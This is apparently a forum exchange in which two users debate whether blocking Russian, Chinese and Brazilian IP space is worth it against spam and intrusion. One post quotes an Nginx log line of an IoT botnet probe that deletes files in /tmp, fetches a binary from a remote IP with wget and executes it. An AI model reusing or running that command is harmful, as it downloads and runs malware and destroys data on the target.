[from]

> Drop Russia, China, and even Brazil (whos network ops never ever ever respond to spam reports).

I don't mean to be presumptuous but what is the benefit of this. Do you spend all day stressing when you see

    112.250.109.154 - - [14/Feb/2023:00:00:18 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 153 "-" "Hello, world"

in your Nginx logs? Actual financial fraud occurs using US residential proxies. Automated scanning occurs in those countries because they have a bunch of cheap insecure routers and IoT devices. Writing angry abuse reports all day is misdirected because the scanning device is probably some hacked Hikvision camera, not a master hacker. You'd be better off trying to get the C2 shut down.

[b112]

So out of endless ways to ruin your day, you claim all financial fraud only comes from US proxies (?!?!?!), and ignore all other threats.

Completely untrue.

So getting hacked never happens from Russia? Russian IPs only scan, but never crack in, takeover, deface, or work their way deep?

And spam has 0 cost, right?

Read the equation again.. 0 downside, endless upside.

[from]

> So out of endless ways to ruin your day, you claim all financial fraud only comes from US proxies (?!?!?!), and ignore all other threats.

If you're referring to banking fraud I'm pretty sure the answer is mostly yes. Maybe sometimes fraudsters are lazy.

> So getting hacked never happens from Russia? Russian IPs only scan, but never crack in, takeover, deface, or work their way deep?

It does, I'm just saying it's almost entirely automated scans and bruteforce using default password combinations and several year old CVEs. If you are vulnerable to those you have bigger problems.

> And spam has 0 cost, right?

Unless you are running some ancient configuration the cost is lower than the amount of engineering work and mental capacity you appear to devoting to stopping it.

I'm not saying you shouldn't make the tradeoff or that it's wrong to do it, just that the amount of security you think you are gaining from it is not as high as you think.

[b112]

I love it. Statements peppered with "almost" and "mostly". How if you are updated, well then you're golden, cause mostly it's old CVEs.

Which ignores that even 0.001% of traffic is a load of more skilled bad actors, this IP space is rotten to the core.

Throughout, I have stated 0 downside, all upside. Even one dedicated hacker gone, is a plus in this scenario. Even showing yourself to be actively, aggressively defending is a plus, if comparables are less guarded.

And you're bracketing the use case, others and I have been speaking of the generic. Many run MTAs, so cutting down on inbound spam and malware, pre-filtering is a plus.

Canning all this address space is a never lose, always win, plus plus plus.

Save yourself the grief. Hot potato it.